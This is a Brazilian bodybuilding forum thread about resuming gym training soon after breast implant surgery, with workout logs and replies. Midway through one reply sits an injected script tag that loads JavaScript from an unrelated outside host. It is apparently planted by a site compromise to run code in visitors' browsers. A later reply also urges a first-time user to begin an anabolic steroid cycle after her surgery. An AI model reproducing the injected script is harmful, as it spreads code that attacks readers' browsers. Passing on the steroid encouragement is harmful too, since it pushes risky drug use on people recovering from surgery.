Ir para conteúdo
  • Cadastre-se

Relato Do Treino - Pós Prótese De Mamas


Juliana Maciel

Posts Recomendados

Bom dia, meninas! Tenho lido demais sobre a volta das meninas na academia após cirurgias estéticas. No meu caso, estou em 22 dias após a prótese de mamas (350ml), não fiz atrás do músculo e, como muitas sabem, esse método tem uma recuperação super tranquila. Voltei a treinar com 16 dias perna, e não treinei leve não! E pasmem, a cada dia que passo estou melhor.

Vou postar meu três primeiros treinos a quem estiver numa situação semelhante. NÃO ESTOU INCENTIVANDO NINGUÉM VOLTAR A TREINAR ANTES DE ORDENS MÉDICAS, pelo contrário! É muito difícil se auto diagnosticar, visto que a cirurgia nada mais é que um trauma no corpo vindo de meios exógenos.Vamos respeitar nossos limites, meninas!

Obs: Treino há 2 anos e meio, cerca de 4 a 7 vezes por semana, e foi a primeira vez que parei de treinar.

16º dia:

Passada com caneleira 3 séries

Extensora 4x12-10 (falha)

Adução 4 x 15

Cadeira flexora unilateral 4x12-10

Panturrilha sentada 6x15

19º dia:

Elevação pélvica com peso (a amiga ajudou) 5x10

Abdução na caneleira 4x10

Agachamento sumô sem peso e em isometria 4x10

Posterior de perna caneleira 4x10

21ºdia:

Passada com caneleira (isolando bem o quadríceps) 4 séries até falha (não é falha total gente)

Posterior (Romanian squats) - com peso de 4kg cada lado em isometria - 4x10

Posterior na caneleira 6x15 (falha) - Sim, adorei esse rs

Panturrilha inclinado 5x 15

Extensora unilateral 4 x fadiga

Gostaria de saber de outras meninas quais exercícios e se tão tendo algum cuidado especial a mais? E também, alguém tem dica de abdominais para fazer??

Lembrando que minha recuperação tem sido super boa, mas com certeza atribuo muito a dieta. Nesse período pré e pós operatório optei por alimentação e suplementação cicatrizantes e antioxidante!!

Editado por Juliana Maciel
Link para o comentário
Compartilhar em outros sites

Publicidade

Minha namorada fez por baixo do músculo por indicação do médico, e parece não ser muito bom pra quem faz musculação e treina peito (messa época ela não pensava em campeonatos e coisa séria, era mais estética mesmo, só que agora ela vai competir.

A recuperação dela foi uns 15 dias tbm, ela sofreu bastante com dor e só voltou a academia 1 mês depois.

Sobre os treinos, ela começou muito leve e superior ainda demorou mais tempo pra poder pegar pesado, inferior foi tranquilo.

Só que ela usava mais maquinas do que livre no começo, tipo fazer agachamento era complicado pq tinha que segurar a barra ae doía perto do suvaco rs.

Link para o comentário
Compartilhar em outros sites

Eu estou louca pra colocar silicone mas tenho medo do pós operatório (odeio faltar academia!). Como ficou sua dieta no pré e pós?

Ah! E outra dúvida: Eu nunca usei anabolizantes mas quero começar meu primeiro ciclo. Seria mais sensato fazer meu ciclo antes ou depois de colocar silicone?

Link para o comentário
Compartilhar em outros sites

  • 3 semanas depois...

Tome cuidado apenas com as cargas pois conheço garotas que também colocaram implantes e após 20 dias ja voltaram a academia, porém uma teve um problema: devido a força, a prótese saiu do lugar, fico meio torta rsrs teve que fazer outra cirurgia pra corrigir, e mais um tempo fora da academia, fora os riscos que voce pode correr.

Com voce pode ter sido normal, sua recuperação foi ótima mas SEMPRE ALERTA, com cirurgia, por mais simples que seja, engloba muita coisa no corpo, então todo cuidado sempre é pouco,

Para evitar problemas poderia evitar exercícios com pesos livres e também de treinar superiores por mais uns dias, creio que até uns 45 dias e sempre ouvir o que o médico diz, voce foi nele por é ele quem entende.

Do resto bons treinos e boa sorte na recuperação.


<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Eu estou louca pra colocar silicone mas tenho medo do pós operatório (odeio faltar academia!). Como ficou sua dieta no pré e pós?

Ah! E outra dúvida: Eu nunca usei anabolizantes mas quero começar meu primeiro ciclo. Seria mais sensato fazer meu ciclo antes ou depois de colocar silicone?

Seria MUITO SENSATO usar os anabols (já que quer usar rs) depois da sua cirurgia.

Provavelmente nesse tempo que voce ficará parada irá perder parte dos seus ganhos e por fim nao adiantara nada.

Faça sua cirurgia (isso deveria ser LEI entre as mulheres rsrsrs) e depois cicle com calma.

Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
×
×
  • Criar Novo...